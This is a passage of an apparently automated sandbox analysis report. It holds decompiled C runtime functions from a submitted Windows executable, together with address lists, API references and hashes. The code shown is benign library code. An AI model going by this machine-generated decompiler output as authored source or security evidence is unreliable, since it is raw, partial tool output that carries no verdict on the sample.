								_t39 = E00413E65(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00414090(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00413E65(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E00413F9F(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x423508 = 2;
					goto L18;
				}
				 *0x423508 = 1;
				goto L6;
			}















                                          0x00417511
                                          0x00417520
                                          0x00417522
                                          0x00417524
                                          0x00417528
                                          0x00417560
                                          0x004175ea
                                          0x00417638
                                          0x00000000
                                          0x00417638
                                          0x004175ec
                                          0x004175ee
                                          0x004175fc
                                          0x004175fe
                                          0x00417600
                                          0x0041760c
                                          0x0041760f
                                          0x00417617
                                          0x0041761c
                                          0x00417625
                                          0x0041761e
                                          0x0041761e
                                          0x0041761e
                                          0x0041762e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417602
                                          0x00417602
                                          0x00417602
                                          0x00417602
                                          0x00417603
                                          0x00417607
                                          0x00417608
                                          0x00000000
                                          0x00417602
                                          0x004175f6
                                          0x004175fa
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004175fa
                                          0x00417566
                                          0x00417568
                                          0x00417576
                                          0x00417579
                                          0x0041757b
                                          0x0041758b
                                          0x00417597
                                          0x0041759e
                                          0x004175a4
                                          0x004175a8
                                          0x004175ab
                                          0x004175b3
                                          0x004175b7
                                          0x004175c8
                                          0x004175ce
                                          0x004175d4
                                          0x004175d4
                                          0x004175d8
                                          0x004175d8
                                          0x004175b7
                                          0x004175dd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0041757d
                                          0x0041757d
                                          0x0041757d
                                          0x0041757e
                                          0x0041757f
                                          0x00417585
                                          0x00417586
                                          0x00000000
                                          0x0041757d
                                          0x0041756c
                                          0x00417570
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417570
                                          0x0041752c
                                          0x00417530
                                          0x00417544
                                          0x00417548
                                          0x00000000
                                          0x00000000
                                          0x0041754e
                                          0x00000000
                                          0x0041754e
                                          0x00417532
                                          0x00000000

                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041752A
                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041753E
                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041756A
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175A2
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175C4
                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175DD
                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 004175F0
                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041762E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                          • String ID:
                                          • API String ID: 1823725401-0
                                          • Opcode ID: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                                          • Instruction ID: 0d29547afa55ef8e208fbe3ff43deda8167c9cf171b961166aceb77faed46397
                                          • Opcode Fuzzy Hash: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                                          • Instruction Fuzzy Hash: 4A31ADB250D3157ED7207F799C848FBBABDEA49368B11053BF555C3200EA298DC286AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00418A6C Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E00418A6C(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x41be18);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x423558; // 0x1
				if(_t31 != 0) {
					L6:
					if(_t31 != 2) {
						if(_t31 != 1) {
							goto L18;
						} else {
							if(_a20 == 0) {
								_t44 =  *0x42354c; // 0x0
								_a20 = _t44;
							}
							asm("sbb eax, eax");
							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
							_v36 = _t37;
							if(_t37 == 0) {
								goto L18;
							} else {
								_v8 = 0;
								E00413CC0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
								_v28 = _t63;
								_t60 = _t63;
								_v40 = _t60;
								E00417DA0(_t60, 0, _t37 + _t37);
								_v8 = _v8 | 0xffffffff;
								if(_t60 == 0) {
									goto L18;
								} else {
									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
									if(_t43 == 0) {
										goto L18;
									} else {
										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
									}
								}
							}
						}
					} else {
						_t45 = _a24;
						if(_t45 == 0) {
							_t45 =  *0x42353c; // 0x0
						}
						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
					}
				} else {
					_push( &_v32);
					_t61 = 1;
					if(GetStringTypeW(_t61, 0x41bdf8, _t61, ??) == 0) {
						if(GetStringTypeA(0, _t61, 0x41bdf4, _t61,  &_v32) == 0) {
							L18:
							_t32 = 0;
						} else {
							_t31 = 2;
							goto L5;
						}
					} else {
						_t31 = _t61;
						L5:
						 *0x423558 = _t31;
						goto L6;
					}
				}
				 *[fs:0x0] = _v20;
				return _t32;
			}





















                                          0x00418a6f
                                          0x00418a71
                                          0x00418a76
                                          0x00418a81
                                          0x00418a82
                                          0x00418a89
                                          0x00418a8f
                                          0x00418a92
                                          0x00418a9b
                                          0x00418adb
                                          0x00418ade
                                          0x00418b07
                                          0x00000000
                                          0x00418b0d
                                          0x00418b10
                                          0x00418b12
                                          0x00418b17
                                          0x00418b17
                                          0x00418b27
                                          0x00418b31
                                          0x00418b37
                                          0x00418b3c
                                          0x00000000
                                          0x00418b3e
                                          0x00418b3e
                                          0x00418b4b
                                          0x00418b50
                                          0x00418b53
                                          0x00418b55
                                          0x00418b5b
                                          0x00418b70
                                          0x00418b76
                                          0x00000000
                                          0x00418b78
                                          0x00418b87
                                          0x00418b8f
                                          0x00000000
                                          0x00418b91
                                          0x00418b99
                                          0x00418b99
                                          0x00418b8f
                                          0x00418b76
                                          0x00418b3c
                                          0x00418ae0
                                          0x00418ae0
                                          0x00418ae5
                                          0x00418ae7
                                          0x00418ae7
                                          0x00418af9
                                          0x00418af9
                                          0x00418a9d
                                          0x00418aa0
                                          0x00418aa3
                                          0x00418ab3
                                          0x00418acd
                                          0x00418ba1
                                          0x00418ba1
                                          0x00418ad3
                                          0x00418ad5
                                          0x00000000
                                          0x00418ad5
                                          0x00418ab5
                                          0x00418ab5
                                          0x00418ad6
                                          0x00418ad6
                                          0x00000000
                                          0x00418ad6
                                          0x00418ab3
                                          0x00418ba9
                                          0x00418bb4

                                          APIs
                                          • GetStringTypeW.KERNEL32(00000001,0041BDF8,00000001,?,74CB70F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AAB
                                          • GetStringTypeA.KERNEL32(00000000,00000001,0041BDF4,00000001,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AC5
                                          • GetStringTypeA.KERNEL32(?,?,?,?,004186BE,74CB70F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AF9
                                          • MultiByteToWideChar.KERNEL32(?,004256C5,?,?,00000000,00000000,74CB70F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418B31
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,004186BE,?), ref: 00418B87
                                          • GetStringTypeW.KERNEL32(?,?,00000000,004186BE,?,?,?,?,?,?,004186BE,?), ref: 00418B99
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: StringType$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 3852931651-0
                                          • Opcode ID: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                                          • Instruction ID: e288f18e772608454304c6360a88be647065f5ca3cb36798b5d5ed4d75a3f5a0
                                          • Opcode Fuzzy Hash: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                                          • Instruction Fuzzy Hash: B0416DB2600219BFCF208F94DC86EEF7F79EB08794F10442AF915D2250D7389991CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004158B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E004158B0(void* __ecx, void* __eflags) {
				char _v8;
				struct _OSVERSIONINFOA _v156;
				char _v416;
				char _v4656;
				void* _t24;
				CHAR* _t32;
				void* _t33;
				intOrPtr* _t34;
				void* _t35;
				char _t36;
				char _t38;
				void* _t40;
				char* _t44;
				char* _t45;
				char* _t50;

				E00413CC0(0x122c, __ecx);
				_v156.dwOSVersionInfoSize = 0x94;
				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
					_t40 = 1;
					return _t40;
				}
				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
					L28:
					_t24 = E00415883( &_v8);
					asm("sbb eax, eax");
					return _t24 + 3;
				}
				_t44 =  &_v4656;
				if(_v4656 != 0) {
					do {
						_t38 =  *_t44;
						if(_t38 >= 0x61 && _t38 <= 0x7a) {
							 *_t44 = _t38 - 0x20;
						}
						_t44 = _t44 + 1;
					} while ( *_t44 != 0);
				}
				if(E00417D60("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
					GetModuleFileNameA(0,  &_v416, 0x104);
					_t45 =  &_v416;
					if(_v416 != 0) {
						do {
							_t36 =  *_t45;
							if(_t36 >= 0x61 && _t36 <= 0x7a) {
								 *_t45 = _t36 - 0x20;
							}
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
					_t32 = E00417CE0( &_v4656,  &_v416);
				} else {
					_t32 =  &_v4656;
				}
				if(_t32 == 0) {
					goto L28;
				}
				_t33 = E00417C20(_t32, 0x2c);
				if(_t33 == 0) {
					goto L28;
				}
				_t34 = _t33 + 1;
				_t50 = _t34;
				if( *_t34 != 0) {
					do {
						if( *_t50 != 0x3b) {
							_t50 = _t50 + 1;
						} else {
							 *_t50 = 0;
						}
					} while ( *_t50 != 0);
				}
				_t35 = E004179F0(_t34, 0, 0xa);
				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
					goto L28;
				}
				return _t35;
			}


















                                          0x004158b8
                                          0x004158c5
                                          0x004158d7
                                          0x004158ed
                                          0x00000000
                                          0x004158ed
                                          0x0041590c
                                          0x004159e2
                                          0x004159e6
                                          0x004159f0
                                          0x00000000
                                          0x004159f2
                                          0x00415914
                                          0x00415920
                                          0x00415922
                                          0x00415922
                                          0x00415926
                                          0x0041592e
                                          0x0041592e
                                          0x00415930
                                          0x00415931
                                          0x00415922
                                          0x0041594d
                                          0x00415964
                                          0x00415970
                                          0x00415976
                                          0x00415978
                                          0x00415978
                                          0x0041597c
                                          0x00415984
                                          0x00415984
                                          0x00415986
                                          0x00415987
                                          0x00415978
                                          0x00415999
                                          0x0041594f
                                          0x0041594f
                                          0x0041594f
                                          0x004159a2
                                          0x00000000
                                          0x00000000
                                          0x004159a7
                                          0x004159b0
                                          0x00000000
                                          0x00000000
                                          0x004159b2
                                          0x004159b3
                                          0x004159b7
                                          0x004159b9
                                          0x004159bc
                                          0x004159c2
                                          0x004159be
                                          0x004159be
                                          0x004159be
                                          0x004159c3
                                          0x004159b9
                                          0x004159cb
                                          0x004159d6
                                          0x00000000
                                          0x00000000
                                          0x004159f7

                                          APIs
                                          • GetVersionExA.KERNEL32 ref: 004158CF
                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00415904
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00415964
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                          • API String ID: 1385375860-4131005785
                                          • Opcode ID: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                                          • Instruction ID: 007b09a40ac423c1d447adb87a92c2e34be193f5817f586218815b66d4303cb2
                                          • Opcode Fuzzy Hash: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                                          • Instruction Fuzzy Hash: 403177F1961648EDEF3196709C82BDF3B78DB46324F2400DBD185D6242E6388EC68B1B
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00417641 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 99%
                                          			E00417641() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00413E65(0x480);
				if(_t89 == 0) {
					E00414C0C(0x1b);
				}
				 *0x425900 = _t89;
				 *0x425a00 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x425900; // 0x770630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x425900; // 0x770630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x425a00);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x425a00 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x425900[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x425904;
					while(1) {
						_t69 = E00413E65(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x425a00 =  *0x425a00 + 0x20;
						__eflags =  *0x425a00;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x425a00 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x425a00; // 0x20
					goto L18;
				}
			}




























                                          0x00417654
                                          0x00417659
                                          0x0041765d
                                          0x00417662
                                          0x00417663
                                          0x00417669
                                          0x00417673
                                          0x00417673
                                          0x00417679
                                          0x0041767d
                                          0x00417681
                                          0x00417684
                                          0x00417688
                                          0x0041768c
                                          0x00417691
                                          0x00417694
                                          0x00417694
                                          0x0041769f
                                          0x004176a5
                                          0x004176aa
                                          0x00417781
                                          0x00417781
                                          0x00417781
                                          0x00417783
                                          0x00417783
                                          0x00417789
                                          0x0041778c
                                          0x00417790
                                          0x00417793
                                          0x004177e2
                                          0x004177e2
                                          0x004177e2
                                          0x00000000
                                          0x004177e2
                                          0x00417795
                                          0x00417797
                                          0x0041779b
                                          0x004177a7
                                          0x004177a9
                                          0x004177a9
                                          0x0041779d
                                          0x0041779f
                                          0x0041779f
                                          0x004177b3
                                          0x004177b5
                                          0x004177b8
                                          0x004177d1
                                          0x004177d1
                                          0x004177ba
                                          0x004177bb
                                          0x004177c1
                                          0x004177c3
                                          0x00000000
                                          0x00000000
                                          0x004177c5
                                          0x004177ca
                                          0x004177cc
                                          0x004177cf
                                          0x004177d7
                                          0x004177da
                                          0x004177dc
                                          0x004177dc
                                          0x00000000
                                          0x004177da
                                          0x00000000
                                          0x004177cf
                                          0x004177e6
                                          0x004177e6
                                          0x004177e7
                                          0x004177e7
                                          0x004177fc
                                          0x004177fc
                                          0x004176b0
                                          0x004176b3
                                          0x004176b5
                                          0x00000000
                                          0x00000000
                                          0x004176bb
                                          0x004176bd
                                          0x004176c3
                                          0x004176cb
                                          0x004176cd
                                          0x004176cf
                                          0x004176cf
                                          0x004176d1
                                          0x004176d7
                                          0x0041772f
                                          0x0041772f
                                          0x00417731
                                          0x00417733
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417735
                                          0x00417735
                                          0x00417738
                                          0x0041773a
                                          0x0041773d
                                          0x00000000
                                          0x00000000
                                          0x0041773f
                                          0x00417741
                                          0x00417743
                                          0x00000000
                                          0x00000000
                                          0x00417745
                                          0x00417747
                                          0x00417754
                                          0x0041775b
                                          0x0041775b
                                          0x00417768
                                          0x00417770
                                          0x00417774
                                          0x00000000
                                          0x00417774
                                          0x0041774a
                                          0x00417750
                                          0x00417752
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417777
                                          0x00417777
                                          0x0041777b
                                          0x0041777c
                                          0x0041777d
                                          0x0041777d
                                          0x00000000
                                          0x004176d9
                                          0x004176d9
                                          0x004176de
                                          0x004176e3
                                          0x004176e8
                                          0x004176eb
                                          0x00000000
                                          0x00000000
                                          0x004176ed
                                          0x004176ed
                                          0x004176f4
                                          0x004176f6
                                          0x004176f6
                                          0x004176fc
                                          0x004176fc
                                          0x004176fe
                                          0x00000000
                                          0x00000000
                                          0x00417700
                                          0x00417704
                                          0x00417707
                                          0x0041770b
                                          0x00417711
                                          0x00417714
                                          0x00417714
                                          0x0041771c
                                          0x0041771f
                                          0x00417725
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00417727
                                          0x00417729
                                          0x00000000
                                          0x00417729

                                          APIs
                                          • GetStartupInfoA.KERNEL32(?), ref: 0041769F
                                          • GetFileType.KERNEL32(?,?,00000000), ref: 0041774A
                                          • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004177AD
                                          • GetFileType.KERNEL32(00000000,?,00000000), ref: 004177BB
                                          • SetHandleCount.KERNEL32 ref: 004177F2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: FileHandleType$CountInfoStartup
                                          • String ID:
                                          • API String ID: 1710529072-0
                                          • Opcode ID: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                                          • Instruction ID: 1521dec5194d53324a877df202082dadc936f581ec6971422c000dc394b087b4
                                          • Opcode Fuzzy Hash: 8c6679148f64bb77278d6d77b9368511d7cfe70b0cd8573ea2dfe0e7b80ae48f
                                          • Instruction Fuzzy Hash: 39510B716086458FC7208B28D8847A67BB0FB11378F65866ED5B2C72E0D738A886C759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00403AA7 Relevance: 7.6, APIs: 5, Instructions: 57COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 83%
                                          			E00403AA7(signed int __ecx) {
				short _v6;
				char _v12;
				short _t12;
				short _t27;
				int _t29;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_v6 = __ecx;
				if(__ecx != 0) {
					_t27 = CharUpperW(__ecx & 0x0000ffff);
					if(_t27 != 0 || GetLastError() != 0x78) {
						_t12 = _t27;
					} else {
						_t29 = WideCharToMultiByte(0, 0,  &_v6, 1,  &_v12, 4, 0, 0);
						if(_t29 != 0 && _t29 <= 4) {
							 *((char*)(_t30 + _t29 - 8)) = 0;
							CharUpperA( &_v12);
							MultiByteToWideChar(0, 0,  &_v12, _t29,  &_v6, 1);
						}
						_t12 = _v6;
					}
				} else {
					_t12 = 0;
				}
				return _t12;
			}









                                          0x00403aaa
                                          0x00403aab
                                          0x00403ab3
                                          0x00403ab7
                                          0x00403ac8
                                          0x00403acc
                                          0x00403b21
                                          0x00403ad9
                                          0x00403aef
                                          0x00403af3
                                          0x00403afd
                                          0x00403b02
                                          0x00403b15
                                          0x00403b15
                                          0x00403b1b
                                          0x00403b1b
                                          0x00403ab9
                                          0x00403ab9
                                          0x00403ab9
                                          0x00403b27

                                          APIs
                                          • CharUpperW.USER32(00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AC2
                                          • GetLastError.KERNEL32(?,00000000,00000000,?,00403B6F), ref: 00403ACE
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000004,00000000,00000000,?,00000000,00000000,?,00403B6F), ref: 00403AE9
                                          • CharUpperA.USER32(?,?,00000000,00000000,?,00403B6F), ref: 00403B02
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,00000001,?,00000000,00000000,?,00403B6F), ref: 00403B15
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
